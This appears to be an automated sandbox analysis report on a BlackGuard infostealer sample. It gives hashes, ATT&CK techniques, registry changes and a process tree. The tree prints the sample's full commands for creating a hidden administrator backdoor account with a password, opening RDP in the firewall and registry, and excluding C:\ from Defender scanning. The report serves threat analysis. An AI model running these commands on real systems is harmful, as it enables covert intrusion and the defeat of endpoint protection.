blackguard | feb090fe2a018ba71f2db302a253998b66f9655a0d83f80db512604093aee9de

Analysis

max time kernel
147s
max time network
150s
platform
windows7_x64
resource
win7-20221111-en
resource tags

arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system
submitted
21-01-2023 19:24

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

file.exe
Size

6.9MB
MD5

146ffe4774086772bb8dc8af417d1bee
SHA1

a6ba1bfd326034d363f003def9600e4b3f8a3c99
SHA256

feb090fe2a018ba71f2db302a253998b66f9655a0d83f80db512604093aee9de
SHA512

332272905c5d85c226fcaa74ad60bf6bdd9544809b4dff4cedba42b42b8aa005c0cf7a9224a3c9070858a7311a640eedfeb1e5c19296b286e3ba5952584f99cb
SSDEEP

98304:5iyaKXumYgc4UC0td7fAYMQSlV4AnEjdGS1YVrsk9N8ivyhAdsPSQxNU3r:o5KmgfUCEvyVN8iNISeU7

Score

10^/10

blackguard collection evasion persistence spyware stealer

Malware Config

Extracted

Family

blackguard

https://ipwhois.app/xml/

Signatures

BlackGuard
Infostealer first seen in Late 2021.
stealer blackguard
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Executes dropped EXE 3 IoCs

pid	Process
1076	Inst.exe
316	check.exe
1688	check_update.exe

Modifies Windows Firewall 1 TTPs 1 IoCs

evasion

Modify Existing Service

T1031

pid	Process
1972	netsh.exe

Sets DLL path for service in the registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\TermService\Parameters\ServiceDll = "%ProgramFiles%\\RDP Wrapper\\rdpwrap.dll"	check.exe

Sets file to hidden 1 TTPs 1 IoCs

Modifies file attributes to stop it showing in Explorer etc.

evasion

Hidden Files and Directories

T1158

pid	Process
240	attrib.exe

Loads dropped DLL 10 IoCs

pid	Process
1360	file.exe
1076	Inst.exe
1076	Inst.exe
1076	Inst.exe
1076	Inst.exe
1948	Process not Found
1076	Inst.exe
1076	Inst.exe
1076	Inst.exe
1076	Inst.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	file.exe
Key opened	\REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	file.exe
Key opened	\REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	file.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000\Software\Microsoft\Windows\CurrentVersion\Run\AdruEWyfSH = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\file.exe\""	file.exe

Modifies WinLogon 2 TTPs 1 IoCs

persistence

Winlogon Helper DLL

T1004

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1"	check.exe

Drops file in Program Files directory 2 IoCs

description	ioc	Process
File created	C:\Program Files\RDP Wrapper\rdpwrap.ini	check.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.dll	check.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Modifies system certificate store 2 TTPs 6 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8	file.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	file.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13	file.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 0f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c1320000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	file.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 1900000001000000100000006cf252fec3e8f20996de5d4dd9aef424030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131d00000001000000100000004558d512eecb27464920897de7b66053140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc41560858910090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000001e000000440053005400200052006f006f00740020004300410020005800330000000f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d20000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	file.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	file.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
1360	file.exe
1804	powershell.exe

Suspicious behavior: LoadsDriver 3 IoCs

pid	Process
1948	Process not Found
1948	Process not Found
1948	Process not Found

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1360	file.exe
Token: SeDebugPrivilege	316	check.exe
Token: SeIncreaseQuotaPrivilege	1808	WMIC.exe
Token: SeSecurityPrivilege	1808	WMIC.exe
Token: SeTakeOwnershipPrivilege	1808	WMIC.exe
Token: SeLoadDriverPrivilege	1808	WMIC.exe
Token: SeSystemProfilePrivilege	1808	WMIC.exe
Token: SeSystemtimePrivilege	1808	WMIC.exe
Token: SeProfSingleProcessPrivilege	1808	WMIC.exe
Token: SeIncBasePriorityPrivilege	1808	WMIC.exe
Token: SeCreatePagefilePrivilege	1808	WMIC.exe
Token: SeBackupPrivilege	1808	WMIC.exe
Token: SeRestorePrivilege	1808	WMIC.exe
Token: SeShutdownPrivilege	1808	WMIC.exe
Token: SeDebugPrivilege	1808	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1808	WMIC.exe
Token: SeRemoteShutdownPrivilege	1808	WMIC.exe
Token: SeUndockPrivilege	1808	WMIC.exe
Token: SeManageVolumePrivilege	1808	WMIC.exe
Token: 33	1808	WMIC.exe
Token: 34	1808	WMIC.exe
Token: 35	1808	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1808	WMIC.exe
Token: SeSecurityPrivilege	1808	WMIC.exe
Token: SeTakeOwnershipPrivilege	1808	WMIC.exe
Token: SeLoadDriverPrivilege	1808	WMIC.exe
Token: SeSystemProfilePrivilege	1808	WMIC.exe
Token: SeSystemtimePrivilege	1808	WMIC.exe
Token: SeProfSingleProcessPrivilege	1808	WMIC.exe
Token: SeIncBasePriorityPrivilege	1808	WMIC.exe
Token: SeCreatePagefilePrivilege	1808	WMIC.exe
Token: SeBackupPrivilege	1808	WMIC.exe
Token: SeRestorePrivilege	1808	WMIC.exe
Token: SeShutdownPrivilege	1808	WMIC.exe
Token: SeDebugPrivilege	1808	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1808	WMIC.exe
Token: SeRemoteShutdownPrivilege	1808	WMIC.exe
Token: SeUndockPrivilege	1808	WMIC.exe
Token: SeManageVolumePrivilege	1808	WMIC.exe
Token: 33	1808	WMIC.exe
Token: 34	1808	WMIC.exe
Token: 35	1808	WMIC.exe
Token: SeIncreaseQuotaPrivilege	996	WMIC.exe
Token: SeSecurityPrivilege	996	WMIC.exe
Token: SeTakeOwnershipPrivilege	996	WMIC.exe
Token: SeLoadDriverPrivilege	996	WMIC.exe
Token: SeSystemProfilePrivilege	996	WMIC.exe
Token: SeSystemtimePrivilege	996	WMIC.exe
Token: SeProfSingleProcessPrivilege	996	WMIC.exe
Token: SeIncBasePriorityPrivilege	996	WMIC.exe
Token: SeCreatePagefilePrivilege	996	WMIC.exe
Token: SeBackupPrivilege	996	WMIC.exe
Token: SeRestorePrivilege	996	WMIC.exe
Token: SeShutdownPrivilege	996	WMIC.exe
Token: SeDebugPrivilege	996	WMIC.exe
Token: SeSystemEnvironmentPrivilege	996	WMIC.exe
Token: SeRemoteShutdownPrivilege	996	WMIC.exe
Token: SeUndockPrivilege	996	WMIC.exe
Token: SeManageVolumePrivilege	996	WMIC.exe
Token: 33	996	WMIC.exe
Token: 34	996	WMIC.exe
Token: 35	996	WMIC.exe
Token: SeIncreaseQuotaPrivilege	996	WMIC.exe
Token: SeSecurityPrivilege	996	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1360 wrote to memory of 1076	1360	file.exe	29
PID 1360 wrote to memory of 1076	1360	file.exe	29
PID 1360 wrote to memory of 1076	1360	file.exe	29
PID 1360 wrote to memory of 1076	1360	file.exe	29
PID 1076 wrote to memory of 316	1076	Inst.exe	30
PID 1076 wrote to memory of 316	1076	Inst.exe	30
PID 1076 wrote to memory of 316	1076	Inst.exe	30
PID 1076 wrote to memory of 316	1076	Inst.exe	30
PID 1076 wrote to memory of 316	1076	Inst.exe	30
PID 1076 wrote to memory of 316	1076	Inst.exe	30
PID 1076 wrote to memory of 316	1076	Inst.exe	30
PID 316 wrote to memory of 1972	316	check.exe	33
PID 316 wrote to memory of 1972	316	check.exe	33
PID 316 wrote to memory of 1972	316	check.exe	33
PID 316 wrote to memory of 1972	316	check.exe	33
PID 1076 wrote to memory of 1688	1076	Inst.exe	34
PID 1076 wrote to memory of 1688	1076	Inst.exe	34
PID 1076 wrote to memory of 1688	1076	Inst.exe	34
PID 1076 wrote to memory of 1688	1076	Inst.exe	34
PID 1688 wrote to memory of 1096	1688	check_update.exe	35
PID 1688 wrote to memory of 1096	1688	check_update.exe	35
PID 1688 wrote to memory of 1096	1688	check_update.exe	35
PID 1096 wrote to memory of 1132	1096	cmd.exe	37
PID 1096 wrote to memory of 1132	1096	cmd.exe	37
PID 1096 wrote to memory of 1132	1096	cmd.exe	37
PID 1132 wrote to memory of 1808	1132	cmd.exe	38
PID 1132 wrote to memory of 1808	1132	cmd.exe	38
PID 1132 wrote to memory of 1808	1132	cmd.exe	38
PID 1132 wrote to memory of 2008	1132	cmd.exe	39
PID 1132 wrote to memory of 2008	1132	cmd.exe	39
PID 1132 wrote to memory of 2008	1132	cmd.exe	39
PID 1096 wrote to memory of 1328	1096	cmd.exe	41
PID 1096 wrote to memory of 1328	1096	cmd.exe	41
PID 1096 wrote to memory of 1328	1096	cmd.exe	41
PID 1328 wrote to memory of 1280	1328	net.exe	40
PID 1328 wrote to memory of 1280	1328	net.exe	40
PID 1328 wrote to memory of 1280	1328	net.exe	40
PID 1096 wrote to memory of 1432	1096	cmd.exe	42
PID 1096 wrote to memory of 1432	1096	cmd.exe	42
PID 1096 wrote to memory of 1432	1096	cmd.exe	42
PID 1432 wrote to memory of 108	1432	net.exe	43
PID 1432 wrote to memory of 108	1432	net.exe	43
PID 1432 wrote to memory of 108	1432	net.exe	43
PID 1096 wrote to memory of 1184	1096	cmd.exe	44
PID 1096 wrote to memory of 1184	1096	cmd.exe	44
PID 1096 wrote to memory of 1184	1096	cmd.exe	44
PID 1184 wrote to memory of 996	1184	cmd.exe	45
PID 1184 wrote to memory of 996	1184	cmd.exe	45
PID 1184 wrote to memory of 996	1184	cmd.exe	45
PID 1184 wrote to memory of 1580	1184	cmd.exe	46
PID 1184 wrote to memory of 1580	1184	cmd.exe	46
PID 1184 wrote to memory of 1580	1184	cmd.exe	46
PID 1096 wrote to memory of 1972	1096	cmd.exe	47
PID 1096 wrote to memory of 1972	1096	cmd.exe	47
PID 1096 wrote to memory of 1972	1096	cmd.exe	47
PID 1972 wrote to memory of 676	1972	net.exe	48
PID 1972 wrote to memory of 676	1972	net.exe	48
PID 1972 wrote to memory of 676	1972	net.exe	48
PID 1096 wrote to memory of 764	1096	cmd.exe	49
PID 1096 wrote to memory of 764	1096	cmd.exe	49
PID 1096 wrote to memory of 764	1096	cmd.exe	49
PID 764 wrote to memory of 1712	764	net.exe	50
PID 764 wrote to memory of 1712	764	net.exe	50
PID 764 wrote to memory of 1712	764	net.exe	50

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1158

pid	Process
240	attrib.exe

outlook_office_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	file.exe

outlook_win_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	file.exe

C:\Users\Admin\AppData\Local\Temp\file.exe
"C:\Users\Admin\AppData\Local\Temp\file.exe"
1⤵
- Loads dropped DLL
- Accesses Microsoft Outlook profiles
- Adds Run key to start application
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- outlook_office_path
- outlook_win_path
PID:1360
- C:\Users\Admin\AppData\Local\Temp\Inst.exe
  "C:\Users\Admin\AppData\Local\Temp\Inst.exe" x -pBlackTeam000111000111!
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:1076
- - C:\Users\Admin\AppData\Local\Temp\check.exe
    "C:\Users\Admin\AppData\Local\Temp\check.exe" -i
    3⤵
    - Executes dropped EXE
    - Sets DLL path for service in the registry
    - Modifies WinLogon
    - Drops file in Program Files directory
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:316
  - - C:\Windows\system32\netsh.exe
      netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
      4⤵
      Modifies Windows Firewall
      PID:1972
- - C:\Users\Admin\AppData\Local\Temp\check_update.exe
    "C:\Users\Admin\AppData\Local\Temp\check_update.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:1688
  - - C:\Windows\system32\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\Upgrade.bat" "
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1096
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c WMIC Group Where "SID = 'S-1-5-32-544'" Get Name /Value | Find "="
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:1132
      - C:\Windows\System32\Wbem\WMIC.exe
        
        WMIC Group Where "SID = 'S-1-5-32-544'" Get Name /Value
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1808
      - C:\Windows\system32\find.exe
        
        Find "="
        6⤵
        
        PID:2008
    - - C:\Windows\system32\net.exe
        
        net user xblackArgus xtrinity3301 /add /active:"yes" /expires:"never" /passwordchg:"NO"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:1328
    - - C:\Windows\system32\net.exe
        
        net localgroup Administrators xblackArgus /add
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:1432
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 localgroup Administrators xblackArgus /add
        6⤵
        
        PID:108
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c WMIC Group Where "SID = 'S-1-5-32-555'" Get Name /Value | Find "="
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:1184
      - C:\Windows\System32\Wbem\WMIC.exe
        
        WMIC Group Where "SID = 'S-1-5-32-555'" Get Name /Value
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:996
      - C:\Windows\system32\find.exe
        
        Find "="
        6⤵
        
        PID:1580
    - - C:\Windows\system32\net.exe
        
        net localgroup "Remote Desktop Users" xblackArgus /add
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:1972
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 localgroup "Remote Desktop Users" xblackArgus /add
        6⤵
        
        PID:676
    - - C:\Windows\system32\net.exe
        
        net accounts /forcelogoff:no /maxpwage:unlimited
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:764
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 accounts /forcelogoff:no /maxpwage:unlimited
        6⤵
        
        PID:1712
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f
        5⤵
        
        PID:1544
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\system\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0x0 /f
        5⤵
        
        PID:1416
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\system\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "MaxConnectionTime" /t REG_DWORD /d 0x1 /f
        5⤵
        
        PID:656
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\system\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "MaxDisconnectionTime" /t REG_DWORD /d 0x0 /f
        5⤵
        
        PID:1060
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\system\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "MaxIdleTime" /t REG_DWORD /d 0x0 /f
        5⤵
        
        PID:1340
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v xblackArgus /t REG_DWORD /d 0x0 /f
        5⤵
        
        PID:852
    - - C:\Windows\system32\attrib.exe
        
        attrib C:\users\xblackArgus +r +a +s +h
        5⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:240
    - - C:\Windows\system32\cacls.exe
        
        "C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"
        5⤵
        
        PID:1308
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -command Add-MpPreference -ExclusionPath C:\
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1804

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user xblackArgus xtrinity3301 /add /active:"yes" /expires:"never" /passwordchg:"NO"
1⤵
PID:1280

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Account Manipulation

T1098

Hidden Files and Directories

T1158

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Winlogon Helper DLL

T1004

Privilege Escalation

Defense Evasion

Hidden Files and Directories

T1158

Install Root Certificate

T1130

Modify Registry

T1112

Credential Access

Account Manipulation

T1098

Credentials in Files

T1081

Discovery

System Information Discovery

T1082

